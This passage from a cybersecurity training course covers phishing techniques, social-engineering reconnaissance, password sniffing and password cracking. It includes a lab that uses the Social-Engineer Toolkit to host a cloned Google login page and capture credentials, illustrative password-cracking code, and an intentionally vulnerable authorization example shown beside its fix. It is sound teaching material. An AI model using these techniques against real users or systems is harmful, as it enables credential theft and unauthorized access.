instant messaging because neither the attacker nor their targets need to be running specific IM
software.
• Social networking sites have messaging components that approximate IMing and email, so
many of those same issues apply. The attacker may overcome the hurdle of trust if the target
adds people they don't really know to their friends list. Another avenue of attack sees the attacker
impersonating a friend of the target; the attacker gathers personal information beforehand, like
the friend's portrait, age, occupation, and interests, and stages a fake profile. They can then use
this profile to convince the target they know each other, making it easier for the attacker to trick
the target into revealing personal information.
• Quick Response (QR) codes can be sent through a variety of different messaging protocols.
They can be used as a delivery medium for phishing because QR codes often carry URL data. If
the URL the QR code links to is malicious, this can place the user's device at risk of infection
when they scan the code. QR code phishing by itself is not very convincing, and the user
probably won't go to the trouble of scanning an unsolicited code. However, in the proper
context, it can be effective. This is especially true when the QR code is made to look like a
coupon, or if accompanying text tells the user that scanning the code will help them save money
on a product they're interested in. The code also hides the destination until it is scanned, so users
should be taught to read the decoded URL that most phone camera apps preview before opening
it.


Figure 3-9: A phishing attempt using an e-card. The attacker has already gathered intelligence
on the recipient's name, birthday, and interests.
o

Phishing and Common Components
Just like the ways they're delivered, phishing attacks have a variety of different ways they can trick
their targets. All these components can even be used in conjunction with one another to maximize
the effect.
• Spoofing messages are used to circumvent a major problem when phishing with various
delivery media. Even non-tech-savvy people will balk at messages they receive from unknown
sources. They might know someone named "John," but the "From:" field in the email header
says e34578dfh@mal-media.example, a pretty big red flag. However, the "From:" header is just
text supplied by the sending system, so it is easily spoofed, and there are tools that automate the
process. An attacker can easily use these so that, when their victim loads their email software,
they see the "From:" field as john.henderson@develetech.com, the actual address of colleague
John Henderson. Even experienced users are often tricked by this because many inaccurately
believe that the "From:" field cannot be spoofed. Sender authentication (SPF, DKIM, and
DMARC) lets a receiving mail server detect this kind of spoofing, but only if the impersonated
domain publishes those records and the recipient's server enforces them; the verdict is recorded
in the message's Authentication-Results header, which is worth checking during an investigation.
• Rogue domains are used in DNS hijacking attacks. Certain malware can alter the client's DNS
configuration and point their resolution services to a DNS server controlled by the attacker. So,
any URL the user enters into their browser could be redirected to a malicious site, even one
spoofed to look like the legitimate site. The phishing message can simply present a link to the
legitimate site, like www.google.com, and the user will be none the wiser. Attackers typically
use rogue domains to trick people into typing their credentials into what they believe is the true
website. One signal survives this attack: the rogue server cannot present a valid HTTPS
certificate for the real host name, so a certificate warning, or a login page served without
HTTPS at all, is what users should be taught never to click through.
• Malicious links can be as simple as directly linking to a website controlled by the attacker, but
this isn't always effective. Much like a non-spoofed email, the user can see a URL named http://
le3.fy7.net/lx8h.aspx and immediately be skeptical. But it's simple to embed that URL into a
much different display URL that's more enticing to the user. Because many users fail to verify the
actual link by hovering their mouse over the display URL (or, on a phone, by long-pressing it),
an attacker can have much more success for almost no extra effort.
• Malicious attachments are perhaps less effective than they used to be. Most email clients
include some form of anti-malware scanning when users attempt to download an attachment,
and mail gateways commonly block executable and macro-enabled file types outright. Users are
also more wary of downloading something from email than they are clicking a link within the
message body. Nevertheless, an attacker can have success if they make the file seem as legitimate
as possible to the user. This is often done in conjunction with spoofing: the message appears to
come from john.henderson@develetech.com, and the attachment is named Q2 sales.xlsx. If the
file is able to avoid detection by the anti-malware, then this could be a strong vector for a Trojan
horse or other malicious software.
The spoofing website used in this example is https://emkei.cz.
Figure 3-10: Using a web-based tool to create a spoofed email (left) and receiving that spoofed
email (right).
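Spoofed From: headers, disguised links and lure attachments all leave traces in the raw message. The following Python script, an added example rather than anything from the course or from the spoofing tool pictured above, parses a constructed message modeled on the John Henderson scenario (the message, its Authentication-Results line and the attachment name are fabricated for the example) and reports a From: domain that differs from the envelope sender in Return-Path, SPF/DKIM/DMARC results other than pass, HTML anchors whose visible text is a URL on a different host than the href, and attachments with executable or macro-enabled extensions.

```python
import email
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed message: the display From is a colleague, but the envelope sender,
# the authentication verdicts, the link target and the attachment say otherwise.
RAW_MESSAGE = b"""Return-Path: <bounce@mal-media.example>
Authentication-Results: mx.develetech.com; spf=fail smtp.mailfrom=mal-media.example; dkim=none; dmarc=fail header.from=develetech.com
From: John Henderson <john.henderson@develetech.com>
To: alice@develetech.com
Subject: Q2 sales figures
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="utf-8"

<html><body><p>Alice, the numbers are on the portal:
<a href="http://le3.fy7.net/lx8h.aspx">https://portal.develetech.com/q2</a></p></body></html>
--b1
Content-Type: application/octet-stream; name="Q2 sales.xlsm"
Content-Disposition: attachment; filename="Q2 sales.xlsm"
Content-Transfer-Encoding: base64

UEsDBBQ=
--b1--
"""

# Extensions that run code or carry macros; assumption for the example.
RISKY_EXT = {".exe", ".scr", ".js", ".vbs", ".hta", ".lnk", ".iso", ".xlsm", ".docm"}


class LinkExtractor(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def domain_of(addr):
    """Domain part of an address such as 'Name <user@host>' (empty if absent)."""
    m = re.search(r"@([\w.-]+)", addr or "")
    return m.group(1).lower() if m else ""


def analyze(raw):
    """Return a list of finding strings for a raw RFC 5322 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    from_dom = domain_of(msg["From"])
    rp_dom = domain_of(msg["Return-Path"])
    if rp_dom and rp_dom != from_dom:
        findings.append(f"From: domain {from_dom} differs from envelope sender {rp_dom}")
    auth = (msg["Authentication-Results"] or "").lower()
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{mech}=(\w+)", auth)
        if m and m.group(1) != "pass":
            findings.append(f"{mech}={m.group(1)} for mail claiming to be from {from_dom}")
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            parser = LinkExtractor()
            parser.feed(part.get_content())
            for href, text in parser.links:
                shown = urlsplit(text).hostname if "://" in text else None
                target = urlsplit(href or "").hostname
                if shown and target and shown != target:
                    findings.append(f"link text shows {shown} but points to {target}")
        name = part.get_filename()
        if name:
            ext = "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""
            if ext in RISKY_EXT:
                findings.append(f"attachment {name!r} has an executable or macro-enabled extension")
    return findings


if __name__ == "__main__":
    for finding in analyze(RAW_MESSAGE):
        print("-", finding)
```

The Return-Path and Authentication-Results headers are added by the receiving server, so they are far harder for the sender to forge than From:; an analyst should still confirm that the Authentication-Results line names their own mail server, since a sender can inject a fake one upstream.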
Social Engineering for Reconnaissance

Ask students if they can think of any more specific scenarios where social engineering can be used
for reconnaissance.

Attackers often use social engineering tactics to glean information from their targets to use in later
attacks. Instead of implementing complex scanning and enumeration techniques, they often find it
easier and more rewarding to simply trick the right people into revealing something about the target.
Consider the following scenarios:


• A social engineer pretending to be an employee calls a human resources department. The social
engineer then politely asks the human resources personnel to provide them with names,
numbers, and emails of all employees in a particular department under the pretense of sending
them gifts. Instead, the social engineer has gathered key personnel information.
• A social engineer meets an employer in person for a job interview. As expected, the social
engineer asks the interviewer questions about the organization. The interviewer may think these
are innocent questions, but in reality, the social engineer is probing for any bit of information
about the organization they are able to get the interviewer to divulge. This can include
information about the company's network infrastructure, the storage protocols they use, the
environments that run on workstations and other hosts, and so on.
• A social engineer crafts a profile on social networking sites. Through this profile, the social
engineer makes friend requests of the private social networking profiles of a company's
employees. The employees, thinking this profile belongs to a colleague or acquaintance, accept
the request. On the employees' profiles are bits of information that people often use as part of
their passwords or as password verification questions. The social engineer is able to gather
intelligence on a large group of the company's personnel to use in an attack.
• A social engineer tailgates into an entrance and then uses this opportunity to observe the
organization's physical security. How many guards are there? What areas do surveillance cameras
cover and where do they not? What other physical security controls are in place? The answers to
these questions can provide the attacker with valuable information about their target.
• A social engineer baits an employee by leaving a USB drive on the ground in the company
parking lot. The employee, curious about what's on the drive, picks it up and plugs it into their
workstation. Rather than executing any sort of overt malware, the social engineer has configured
this drive to automatically run port scanning and network enumeration software. The social
engineer now has a wealth of information about the company's network they can use to launch a
successful attack.

ACTIVITY 3-5
Assessing the Impact of Social Engineering

Before You Begin
Kali Linux is running. You'll be using the Social-Engineer Toolkit, a Python-based exploit
framework that can create a wide variety of automated social engineering attacks.

Scenario
Several employees recently had some of their personal credentials stolen. These credentials were to
major sites like Google, Facebook, and LinkedIn. All of the victims claim that, in accordance with
company security policy, they never directly gave their user names and passwords to anyone asking
for them. You therefore suspect they were tricked in a more subtle way: the websites they thought
they were logging in to were in fact convincing forgeries.
In order to assess how effective pharming attacks are on your personnel, you'll see just how easy it is
to spoof the sign-in page of a major public website. For now, it was just the employees' personal
accounts that were compromised, but you don't want this to happen when they log in to an
internal website with their work credentials.

1. Open the Social-Engineer Toolkit.
a) In Kali Linux, open a terminal.
b) At the prompt, enter sudo setoolkit
c) Enter y to accept the terms of service.

Remind students they should enter kali if they are prompted to enter a password after running a
sudo command.

2. Verify the available options and select one that will enable a pharming attack.
a) Enter 1 to select Social-Engineering Attacks.
b) Enter 2 to select Website Attack Vectors.
c) Enter 3 to select Credential Harvester Attack Method.
This will create a fake login site and send any POST data (the submitted form fields) back to you.
d) Enter 1 to select Web Templates.

Note: In this activity, you will use a fake Google sign-in page as the template.
You can also create your own fake site, or import one.

3. Start the server that will host the fake web page.
a) At the prompt, enter 10.39.5.#, where # is the last octet of your Kali Linux VM's IP address.
This is the address the harvested form data will be posted back to.
b) Enter 2 to select the Google template.
The Google template will spoof a Google login page and ask for a user name and password.

4. Simulate the victim falling prey to the pharming attack.
a) Minimize Kali Linux and switch to your Windows 10 client.
b) Open a web browser and navigate to http://10.39.5.#, where # is the last octet of your Kali Linux
VM's IP address.
In a real-world scenario, the attacker would use an embedded link, a shortened address, or a
compromised domain name to make the site more convincing to the victim.

Consider pointing out that the spoofed site isn't perfect; for example, it might be using an older
style of login page that Google has since changed, and it is served over plain HTTP rather than
HTTPS.


c) Enter a fake user name and password combination into the sign-in fields, and then select the Sign in
button.

e
ut
ib
tr
is
D
or
e
at
lic

d) Close the browser.

5. Verify that your server captured the sign-in attempt.
a) Switch back to your Kali Linux VM.

b) Verify that the terminal captured the user name and password you typed into the fake Google sign-in
page.


6. What could make this attack more difficult for the attacker?

A: Answers may vary. Encouraging employees to use Google's two-factor authentication would help
mitigate this type of pharming attack, although a one-time code typed into the fake page can be
relayed to the real site by a real-time proxy, so phishing-resistant methods such as FIDO2 security
keys, which are bound to the genuine site's origin, are the stronger defense. Also, implementing user
policies that discourage clicking unsolicited links could help prevent the attack from succeeding.
7. What could make this attack more effective?


A: Answers may vary. An attacker may be able to fool the users more easily if the link itself is believable, especially if they're spoofing a major website like Google. Likewise, they may choose to spoof a less well-known site to catch the users off guard. This is especially effective if they've convinced the users they need to enter their credentials for official reasons.

8. What is the most significant weak spot that enables attacks like these to
succeed, and what can be done to fix the problem?

A: Answers may vary, but almost always, it's the human factor that is the weakest point in social engineering attacks. Preventing these types of attacks from succeeding requires security awareness training and fostering a cybersecurity culture within the organization.



9. Close any open windows in Kali Linux.


Summary
In this lesson, you analyzed the threat of attackers gathering intelligence on your network, systems,
and people. This intelligence can empower an attacker to launch a more devastating attack on your
organization. On the other hand, knowing what information you're exposing to attackers can
empower you to address glaring holes in your security.
What reconnaissance method is of most concern to you and your organization?
A: Answers will vary. Students in public-facing companies may be most wary of footprinting, as a good deal of operational information can be easily accessible via the Internet. Others may be concerned about attackers scanning their network for open ports to use as a vector for attack. Some students may be wary of having their entire network mapped with an enumerator, which could make it easier for an attacker to flood key devices that keep the network running optimally.

What sort of social engineering tactics have you or others you know experienced? How well are friends, family, and colleagues able to spot attempts to manipulate them for information?
A: Answers will vary. Students are likely familiar with phishing, spam, and other communication-based social engineering attacks. They may not have considered more physical social engineering, like tailgating and dumpster diving. Students may know someone who was the victim of a social engineering attack, indicating that some attacks are very convincing, the victims are undereducated on the subject of cybersecurity, or both.

Encourage students to use the social networking tools provided on the CHOICE Course screen to follow up with their peers after the course is completed for further discussion and resources to support continued learning.

Note: Check your CHOICE Course screen for opportunities to interact with your classmates, peers, and the larger CHOICE online community about the topics covered in this course or other topics you are interested in. From the Course screen you can also access available resources for a more continuous learning experience.



4 Analyzing Attacks on Computing and Network Environments

Lesson Time: 5 hours
Lesson Introduction
You've analyzed the general risks and threats to your systems, and you've identified how attackers can gather intelligence on these systems. Now you can begin to analyze the major attacks themselves. There's a wide variety of ways malicious users can compromise your operations, and it's vital you understand the potential effects of each one on the organization.

Lesson Objectives

In this lesson, you will:



• Assess the impact of system hacking attacks.
• Assess the impact of threats to web apps and services.
• Assess the impact of malware.
• Assess the impact of hijacking and impersonation attacks.
• Assess the impact of denial of service incidents.
• Assess the impact of threats to mobile infrastructures.
• Assess the impact of threats to cloud infrastructures.


TOPIC A
Assess the Impact of System Hacking Attacks
In this topic, you'll consider how attackers can break into a system by finding or creating an
opening, and exploiting it.

System Hacking

There are numerous tasks an attacker might perform when deciding to target a host such as a server or workstation. In general, the approach will involve a combination of planning, knowledge, skills, tools, and luck. While having an arsenal of good tools and methodologies will help the hacker, there is not a single path to success. Every target is different, and the caretakers of a particular target may have gone to great lengths to secure it from attack. So persistence, attention to detail, and an ability to quickly identify and take advantage of opportunities are critical to the attacker's success. Unfortunately, an attacker needs only one open door (literally or figuratively) to gain access, and comprehensive security requires locking down thousands of potential access points.

Throughout this lesson, consider pointing to specific Common Vulnerabilities and Exposures (CVE), Common Weakness Enumeration (CWE™), and Common Attack Pattern Enumeration and Classification (CAPEC™) entries that demonstrate the real-world impact of these attacks and their related vulnerabilities. Some examples are provided for you in content delivery tips.

Figure 4-1: The system hacking process.

1. Start with a goal: The attacker might start with a specific goal in mind, such as defacing content on a particular web server or obtaining sensitive information that can be sold or held for ransom. Or the attacker might have a very fuzzy goal—exploring to find vulnerabilities and deciding what (if anything) to do about them once they are found.
2. Plan the attack: The attacker begins by formulating a plan of attack. Through personal experience and information shared by others, an attacker would know common patterns for performing such an attack, and would likely possess various scripts and applications to automate some of the busy work. In the case of an attack upon a web server, the attacker would consider the attack surface, the various fronts on which such an attack could be launched:
• The operating system the server runs on, such as Windows® or Linux®.
• The server application itself (such as Apache or Internet Information Services [IIS]) provides another front.
• Supporting systems and applications, such as databases, can be attacked (through SQL injection, for example).
• Other servers co-located on the same host or local network.
• Other applications on the host, such as Secure Shell (SSH) or Windows Remote Desktop, can also provide a vector for attack.
3. Perform reconnaissance: Because the attacker doesn't know which front will be unprotected, each one must be discovered and tested. Various sorts of reconnaissance might be useful in an attack upon a web server, including:
• Footprinting, scanning, and enumeration of the server.
• Crawling the website to reveal structural information.
• Using Google to search for types of dynamic content used.
• Using public tools like Whois to search for registration information.
• Using social engineering tactics like dumpster diving to discover more useful information.
4. Identify potential vulnerabilities based on the information collected. For example, the attacker might look up possible vulnerabilities for the software running on the host, such as those listed in the National Vulnerability Database (NVD), the Common Vulnerabilities and Exposures (CVE) list, or Offensive Security's Exploit Database (https://www.exploit-db.com/about-exploit-db/).
5. Exploit the vulnerabilities: For example, an attacker might:
• Start or stop services on the host.
• Disable or edit logs to hide the attack.
• Dig further into the site to gain more information about the site and its data.
• Load malware onto the site to infect other systems and users.
• Modify forms, databases, and other files to automatically forward sensitive data to other collection points.
• Use the server as a launching point for attacks on other hosts.
• Deface data on the site.
6. Conduct post-attack activities: To ensure they aren't detected or identified during or after an exploit, an attacker will attempt to eliminate all traces of their hack. This can help the attacker evade any forensic processes the organization implements in the wake of a breach. Even if attackers can't completely hide their attack, they may still be able to at least remove all evidence that points back to them as the culprit. Attackers will also attempt to persist in a target environment as part of the post-attack phase; this will enable them to reuse access and continue exploitation over a long period of time.

Password Sniffing
Password sniffing is an attack where the attacker monitors network transmissions for password data to extract that data for later use. Network users often transmit credential information both within the private network and outside its boundaries, such as through the Internet. For example, a network administrator's daily routine may involve opening a remote shell into various servers in the organization to configure and maintain them. Every time the administrator attempts access to the shell, they will likely need to transmit credentials to an authentication server. That transmission is the target of a sniffing attack.

This is particularly a problem when these credentials are transmitted in plaintext, as they are by protocols such as Telnet, FTP, and HTTP basic authentication. Users on public Wi-Fi networks are at great risk of having their credentials stolen if they fail to use protocols protected by Transport Layer Security (TLS, the successor to Secure Sockets Layer [SSL]). If the attacker captures the traffic, they can simply read the user name and password out of the packet. Transmissions that are encrypted, however, halt a password sniffer's attempts unless the attacker possesses the decryption key or can insert themselves into the session as a man-in-the-middle. In the previous example, the administrator is most likely using a protocol such as Secure Shell (SSH) to establish an encrypted tunnel.

Organizational networks, especially larger ones, are usually segmented. This can prevent a sniffer from ever seeing traffic that flows outside the segment where it is located. So, even if a transmission is in plaintext or the attacker can decrypt it, they may not see that transmission in the first place. Attackers can increase their chances of capturing passwords by placing the sniffer at key points in the network. For example, a sniffer installed on a proxy device may be able to see all traffic that is externally bound and must first pass through the proxy.

Lesson 4: Analyzing Attacks on Computing and Network Environments | Topic A


Figure 4-2: Sniffing a password in Wireshark.

Active vs. Passive Sniffing
Sniffing can be divided into two general types: active and passive. In passive sniffing, the attacker captures only the traffic that already reaches their network interface, for example on a hub, on a wireless network, or on a switch port mirrored to them; nothing is transmitted, so there is little for the victim to detect. In active sniffing, the attacker injects traffic into the network in order to see packets a switch would not otherwise deliver to them, for instance by poisoning the ARP caches of the victim and the gateway so that their conversation is routed through the attacker's host (as tools such as Ettercap do), or by flooding a switch's MAC address table so that it falls back to forwarding frames to every port. Active techniques see more traffic but generate packets that network monitoring can spot.

Password Cracking
Example CVE IDs: CVE-2009-4269 and CVE-2012-2742.

Password cracking is the recovery of secret passwords from data stored or transmitted by a computer. Password crackers typically crack passwords in one of the following four methods:
• Brute-force password cracking tries every possible combination of characters until one matches. Brute-force password cracking is extremely resource intensive and can take a long time to be successful, as password crackers generate every possible permutation for a given set of characters and numbers defined by a minimum and maximum length. This process can take anywhere from seconds to thousands of years depending on the length and character set of the password being cracked and on how fast the hash algorithm can be computed. It is therefore most effective on shorter passwords.
• Dictionary password cracking uses a targeted technique of successively trying all the words in a pre-written, exhaustive list. This type of password cracking is typically faster than brute-force attacks, as it only tries candidates that people are likely to have used. The main reason dictionary password cracking tends to be successful is that many people choose passwords that are short, single words found in standard dictionaries, or easily predicted variations of them, such as appending a digit or special character to a simple word. Note that not all entries in a password dictionary are necessarily literal dictionary words; lists of passwords leaked in real breaches are the most effective dictionaries.
• Hybrid password cracking uses a combination of both brute-force and dictionary password-cracking techniques. A hybrid password-cracking application will modify a word list or dictionary by making common substitutions to letters, such as replacing the letter "a" with the "@" sign. These tools also typically append characters and numbers to the end of dictionary words; for example, the password "password" may be guessed as: p@ssword, p@ssw0rd, password1, password01, pa$$word, and so on. This technique tends to be faster than standard brute-force attacks, but slower than standard dictionary attacks.
• Rainbow tables are files of precomputed hash chains that let an attacker look up the password for a given hash far faster than recomputing every hash for each new target. Using rainbow tables dramatically reduces the time needed to crack a password, at the cost of a one-time computation and a large amount of storage. A table covers a bounded password space (for example, all alphanumeric passwords of up to eight characters) for one specific algorithm, such as LM, NTLM, MD5, or SHA-1. What limits a table is the size of the password space it must cover, not the length of the hash output, so an unsalted fast hash such as SHA-256 is not immune. Adding a cryptographic salt to the hashing process defeats rainbow tables, because the same password then produces a different hash for every user and the attacker would need a separate table for every salt value.

Consider demonstrating the RainbowCrack website at project-rainbowcrack.com. Online vs. offline password cracking is discussed later with penetration testing, but you may wish to introduce the concepts here.


Consider informing students that online versus offline password attacks will be discussed in a later lesson.
Figure 4-3: The results of a password crack.

Masked Attack

A masked attack is a type of brute-force cracking that goes about the process in a smarter way. Because people often act predictably, especially when it comes to creating passwords, attackers can shape their cracking attempt around these predictions. A password like Martin1945 exhibits several traits common to passwords, including the starting character being uppercase, and the last four characters being a year (typically the person's year of birth). Using these conventions, the attacker can craft their attack with a mask, which is a placeholder describing the set of values you'd expect to find at each character position. The mask for the first character might be a placeholder for all 26 letters of the English alphabet in uppercase, followed by five lowercase letters, and the last four characters might be any year between 1910 and 2010. Tools that support masks express this as a pattern such as ?u?l?l?l?l?l?d?d?d?d, where ?u, ?l, and ?d stand for an uppercase letter, a lowercase letter, and a digit respectively. Successful masking can significantly reduce the time it takes to brute force a password: this ten-character mask needs 26 × 26^5 × 10^4 guesses, a tiny fraction of the 95^10 that a full printable-character brute force of the same length would require, so an attack that would otherwise be infeasible can finish in minutes against a fast hash on modern GPU hardware.

Password Storage

How passwords are stored greatly affects the time it takes to crack them. Passwords stored as cryptographic hashes are much less likely to be cracked than passwords stored in plaintext, which require no cracking at all. Not all cryptographic hashes are equal, however. The success of a cracking attempt may depend on the standards the target organization has in place. Incorporating obsolete or insecure hashing algorithms like MD5 will pose less of a challenge to an attacker than a stronger algorithm like SHA-512. Note, though, that general-purpose hashes such as SHA-512 are designed to be fast, which also makes them fast to guess against: an attacker with GPUs can test billions of candidates per second. Passwords should therefore be stored with a unique per-user salt and a deliberately slow, tunable password hashing function such as bcrypt, scrypt, Argon2, or PBKDF2, which makes every guess expensive and every user's hash unique.
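The following worked example ties together the four cracking methods, the mask attack, and the effect of salted storage described above. It is added illustration code written for this page; it is not part of the CertNexus course and not code from any cracking tool. The wordlist, leet substitutions, suffixes, "leaked" hashes, salts, and year range are all constructed for the demonstration; the ?u, ?l, and ?d mask tokens follow the notation hashcat uses.

```python
import hashlib
import itertools

# Constructed stand-in for a real wordlist such as top1000pass.txt.
WORDLIST = ["password", "letmein", "welcome", "martin", "summer"]
LEET = {"a": "@", "o": "0", "s": "$", "e": "3", "i": "1"}   # common substitutions
SUFFIXES = ["", "1", "01", "123", "!"]                       # common appendages
CHARSETS = {"?u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
            "?l": "abcdefghijklmnopqrstuvwxyz",
            "?d": "0123456789"}


def hybrid_candidates(words):
    """Dictionary words plus the mutations a hybrid attack applies: an initial
    capital, every subset of the leet substitutions, and a common suffix."""
    for word in words:
        variants = {word, word.capitalize()}
        for r in range(1, len(LEET) + 1):
            for subset in itertools.combinations(LEET.items(), r):
                table = dict(subset)
                variants.add("".join(table.get(c, c) for c in word))
        for base in sorted(variants):
            for suffix in SUFFIXES:
                yield base + suffix


def parse_mask(mask, custom=None):
    """Turn a hashcat-style mask into per-position alternatives. ?u ?l ?d are
    built in; tokens such as ?1 are caller-supplied sets; anything else is literal."""
    custom = custom or {}
    positions, i = [], 0
    while i < len(mask):
        token = mask[i:i + 2]
        if token in CHARSETS or token in custom:
            positions.append(list(CHARSETS.get(token) or custom[token]))
            i += 2
        else:
            positions.append([mask[i]])
            i += 1
    return positions


def mask_space_size(mask, custom=None):
    """Number of guesses the mask implies, i.e. the brute-force cost it replaces."""
    size = 1
    for alternatives in parse_mask(mask, custom):
        size *= len(alternatives)
    return size


def mask_candidates(mask, custom=None):
    for combo in itertools.product(*parse_mask(mask, custom)):
        yield "".join(combo)


def md5_hex(password):
    return hashlib.md5(password.encode()).hexdigest()


def salted_sha256(password, salt):
    return hashlib.sha256((salt + password).encode()).hexdigest()


def build_table(candidates, hashfunc):
    """Precompute hash -> password once and reuse it against any number of hashes
    of the same unsalted algorithm. Rainbow tables compress this idea into chains."""
    return {hashfunc(c): c for c in candidates}


def online_guess(candidates, hashfunc, target):
    """Guess one record at a time: the only option once each hash has its own salt."""
    for candidate in candidates:
        if hashfunc(candidate) == target:
            return candidate
    return None


def demo():
    hybrid = list(hybrid_candidates(WORDLIST))
    # Constructed "leaked" credential stores: unsalted MD5 and per-user salted SHA-256.
    unsalted = {"alice": md5_hex("p@ssw0rd"), "bob": md5_hex("Welcome1")}
    salts = {"carol": "9f1c", "dave": "e07b"}
    salted = {u: salted_sha256("p@ssw0rd", s) for u, s in salts.items()}
    table = build_table(hybrid, md5_hex)
    years = [str(y) for y in range(1910, 2011)]
    return {
        "table_hits_unsalted": {u: table.get(h) for u, h in unsalted.items()},
        # Same table against salted hashes: every lookup misses, the salt changed the input.
        "table_hits_salted": {u: table.get(h) for u, h in salted.items()},
        # Per-record guessing still works, but the full cost is paid again for each user.
        "online_hits_salted": {
            u: online_guess(hybrid, lambda c, s=salts[u]: salted_sha256(c, s), h)
            for u, h in salted.items()},
        "mask_hit": online_guess(mask_candidates("?uartin?1", {"?1": years}),
                                 md5_hex, md5_hex("Martin1945")),
        "mask_space": mask_space_size("?uartin?1", {"?1": years}),
        "full_mask_space": mask_space_size("?u?l?l?l?l?l?d?d?d?d"),
    }
```

Running demo() shows both unsalted MD5 hashes recovered from a single precomputed table, the same table missing every salted hash, the salted hashes still falling to per-record guessing because the password itself is weak, and the Martin1945 mask search covering 2,626 candidates instead of the 3 × 10^12 of the general ten-character mask.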

Privilege Escalation

Once an exploit has been launched, one of the first objectives of an attack is typically to provide the attacker with extensive access to the exploited system. This process is called privilege escalation. With privilege escalation, the user is able to obtain access to additional resources or functionality that they are normally not allowed access to. One of the most common scenarios is when a normal user is able to exploit some vulnerability in a system to gain administrator or root-level privileges.

Example CVE IDs: CVE-2016-0197, CVE-2016-0180, and CVE-2016-0161.

There are actually two distinct types of privilege escalation: vertical and horizontal.
Vertical privilege escalation, also called privilege elevation, occurs when a user can perform functions that are not normally assigned to their role or explicitly permitted. A lower-privilege application or user gains access to content or functions that are reserved for a higher-privilege-level user, such as root or an administrator.
Horizontal privilege escalation occurs when a user accesses or modifies specific resources they are not entitled to. For example, an attacker may be able to manipulate input parameters in a vulnerable application to obtain other app users' private data.
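The two escalation types above appear in application code as two different missing checks. The following is an added example written for this page, not course code: a toy document service in which a horizontal escalation (one user reading another's document by changing an identifier) and a vertical escalation (a normal user invoking an admin-only function by supplying a client-controlled flag) are each shown beside the check that closes them. Users, roles, and documents are constructed for the demonstration.

```python
from dataclasses import dataclass


class Forbidden(Exception):
    """Raised by the fixed handlers when the caller is not authorized."""


@dataclass(frozen=True)
class User:
    name: str
    role: str  # "user" or "admin", as recorded by the server at login


# Constructed data: a few accounts and two documents with their owners.
USERS = {"alice": User("alice", "user"), "bob": User("bob", "user"),
         "root": User("root", "admin")}
DOCS = {1: ("alice", "alice: tax return 2019"),
        2: ("bob", "bob: medical history")}


# Horizontal escalation: alice reads bob's document by changing doc_id.
def get_doc_vulnerable(actor, doc_id):
    """Checks that *someone* is logged in, never that they own the document."""
    if actor.name not in USERS:
        raise Forbidden("not logged in")
    return DOCS[doc_id][1]


def get_doc_fixed(actor, doc_id):
    """Authorization is an ownership check performed on the server, per request."""
    owner, body = DOCS[doc_id]
    if actor.name != owner and actor.role != "admin":
        raise Forbidden(f"{actor.name} may not read document {doc_id}")
    return body


# Vertical escalation: a normal user performs an admin-only function.
def delete_user_vulnerable(actor, target, users, is_admin_param):
    """Trusts an is_admin flag supplied by the client (hidden form field,
    cookie, JSON attribute); the attacker simply sets it to true."""
    if not is_admin_param:
        raise Forbidden("admins only")
    users.pop(target, None)
    return target not in users


def delete_user_fixed(actor, target, users):
    """The role comes from the server's own record of the authenticated user,
    never from anything the request carried."""
    if USERS[actor.name].role != "admin":
        raise Forbidden(f"{actor.name} is not an administrator")
    users.pop(target, None)
    return target not in users


def demo():
    alice = USERS["alice"]
    results = {"horizontal_vuln": get_doc_vulnerable(alice, 2)}
    try:
        get_doc_fixed(alice, 2)
        results["horizontal_fixed"] = "allowed"
    except Forbidden as exc:
        results["horizontal_fixed"] = f"denied: {exc}"
    results["vertical_vuln"] = delete_user_vulnerable(alice, "bob", dict(USERS),
                                                      is_admin_param=True)
    try:
        delete_user_fixed(alice, "bob", dict(USERS))
        results["vertical_fixed"] = "allowed"
    except Forbidden as exc:
        results["vertical_fixed"] = f"denied: {exc}"
    results["admin_fixed"] = delete_user_fixed(USERS["root"], "bob", dict(USERS))
    return results
```

The pattern to look for when assessing an application is the same in both halves: authentication establishes who the caller is, but every resource access and every privileged operation still needs its own server-side authorization decision based on server-held state, not on parameters the client chose.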

Figure 4-4: Comparing vertical and horizontal privilege escalation.

Social Engineering for Systems Hacking



One of the most powerful system hacking tools a hacker has in their arsenal is a non-technical one: social engineering. As you've seen, a social engineer can glean quite a bit of reconnaissance information through trickery and deception. This can directly translate into a much more successful and devastating system hack. Take, for example, an attacker who is able to trick an employee into revealing access credentials to a customer database. The attacker pretends to be the IT help desk and requests that the employee provide their user name and password so the attacker can verify their security. The employee trusts the attacker's assumed authority and falls for this ploy.

Now, consider the alternative: the attacker would need to launch a series of complicated and technical attacks to either brute force the password or somehow exploit a flaw in the database's authentication systems. Neither of these possibilities is guaranteed to work, much less be achieved quickly and easily. Yet, through a simple confidence trick, the attacker got everything they needed to infiltrate the database with minimal effort.

This is why hackers who employ social engineering at the onset are often so successful: the human being is the weakest link in any system. Your technical controls are not strong enough to combat the consequences of a poor or non-existent security culture in your organization.

System Hacking Tools and Exploitation Frameworks


The following are examples of popular tools and frameworks attackers may use to hack systems.
Password sniffers
• Wireshark
• Cain & Abel
• tcpdump


• Kismet
• Ettercap
• Nagios Network Analyzer
Password crackers
• John the Ripper
• Cain & Abel
• THC Hydra
• pwdump
• Ophcrack
• Medusa
• Ncrack
Exploitation frameworks
• Metasploit Framework
• Core Impact
• CANVAS
• w3af
• BeEF

ACTIVITY 4-1
Assessing the Impact of System Hacking Attacks

Data File
/home/kali/Desktop/top1000pass.txt

Before You Begin
You'll be using your Kali Linux™ VM and Ncrack to crack your Windows Server® Administrator password. Ncrack will perform an online password attack against the running SSH server, which has already been set up for you. The SSH server being used is OpenSSH. The dictionary list you'll be using to crack the server is a text file of the top 1,000 commonly used passwords.
Scenario

